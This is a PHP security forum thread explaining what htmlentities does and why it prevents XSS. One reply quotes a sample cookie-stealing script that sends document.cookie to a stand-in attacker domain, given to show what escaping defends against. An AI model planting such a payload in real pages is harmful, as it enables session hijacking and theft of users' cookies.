The HTML Entities Function

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

The HTML Entities Function

Post by pilau »

Htmlentities... right.

Can somebody explain what it does actually?
Why do we need it? In what cases?

TIA
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

turns anything that is a special html character into it's entity, entities are like html tags that cause html to be outputted "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold html tag to output plainly to the screen. It's useful in posting examples of html source but is also a security necessity against XSS (allowing other users to 'inject' html into your page)
pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

Post by pilau »

Great, thanks mate.
User avatar
Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

Post by Jenk »

An example of HTML injection/XSS attack (Cookie stealing)

Code: Select all

<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Now if these forums did not use htmlentities (or similar function) then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.

But because php's htmlentities() replaces '<' with '<' and '>' with '>' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.

There are other characters that are changed aswell, " (double quote) for example.
pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

Post by pilau »

Cool. thanks you.
User avatar
$var
Forum Contributor
Posts: 317
Joined: Thu Aug 18, 2005 8:30 pm
Location: Toronto

Post by $var »

that's fun.
Post Reply